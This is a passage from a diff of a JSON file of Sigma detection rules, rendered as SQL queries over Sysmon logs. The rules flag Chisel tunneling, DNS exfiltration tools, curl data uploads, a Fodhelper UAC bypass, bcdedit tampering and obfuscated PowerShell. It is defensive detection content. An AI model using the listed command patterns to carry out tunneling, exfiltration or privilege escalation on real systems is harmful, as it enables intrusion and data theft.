'%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gpresult_execution.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Remote Access Tool - NetSupport Execution From Unusual Location", - "id": "37e8d358-6408-4853-82f4-98333fca7014", - "status": "experimental", - "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", + "status": "stable", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unknown" + "Legitimate setups that use similar flags" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "title": "Suspicious ZipExec Execution", + "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "author": "frack113", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.005" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_hktl_zipexec.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1053.005" - ], - "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" - }, - { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", - "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "New Generic Credentials Added Via Cmdkey.EXE", - "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", - "status": "experimental", - "description": "Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface.", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", + "id": "74403157-20f5-415d-89a7-c505779585cf", + "status": "test", + "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003.005" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Legitimate use to pass password to different powershell commands" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" + "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "title": "Suspicious Scheduled Task Creation via Masqueraded XML File", + "id": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence", + "author": "Swachchhanda Shrawan Poudel, Elastic (idea)", "tags": [ "attack.defense_evasion", "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1036.005", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/create%' ESCAPE '\\' OR CommandLine LIKE '%-create%' ESCAPE '\\') AND (CommandLine LIKE '%/xml%' ESCAPE '\\' OR CommandLine LIKE '%-xml%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%.xml%' ESCAPE '\\') OR (IntegrityLevel = 'System') OR (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%:\\\\WINDOWS\\\\Installer\\\\MSI%' ESCAPE '\\' AND ParentCommandLine LIKE '%.tmp,zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\'))) AND NOT (((ParentImage LIKE '%:\\\\ProgramData\\\\OEM\\\\UpgradeTool\\\\CareCenter\\_%\\\\BUnzip\\\\Setup\\_msi.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Camera Station\\\\SetupActions.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Device Manager\\\\AdmSetupActions.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files (x86)\\\\Zemana\\\\AntiMalware\\\\AntiMalware.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files\\\\Dell\\\\SupportAssist\\\\pcdrcui.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" }, { - "title": "Suspicious Process Start Locations", - "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", + "title": "Suspicious XOR Encoded PowerShell Command", + "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", "status": "test", - "description": "Detects suspicious process run from unusual locations", - "author": "juju4, Jonhnathan Ribeiro, oscd.community", + "description": "Detects presence of a potentially xor encoded powershell command", + "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036", - "car.2013-05-002" + "attack.execution", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_run_locations.yml" + "filename": "proc_creation_win_powershell_xor_commandline.yml" }, { - "title": "Remote File Download via Desktopimgdownldr Utility", - "id": "214641c2-c579-4ecb-8427-0cf19df6842e", - "status": "experimental", - "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", - "author": "Tim Rauch", + "title": "Potential Data Exfiltration Via Curl.EXE", + "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "status": "test", + "description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", + "attack.exfiltration", + "attack.t1567", "attack.t1105" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" + "filename": "proc_creation_win_curl_fileupload.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", - "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", + "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "status": "test", + "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", + "author": "@neu5ron", "tags": [ - "attack.execution", + "attack.defense_evasion", + "attack.t1070", "attack.persistence", - "attack.t1059" - ], - "falsepositives": [ - "Legitimate use by administrator" + "attack.t1542.003" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_bcdedit_susp_execution.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution" @@ -17437,3634 +17330,3802 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", - "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "status": "test", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", - "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "status": "test", + "description": "Detects 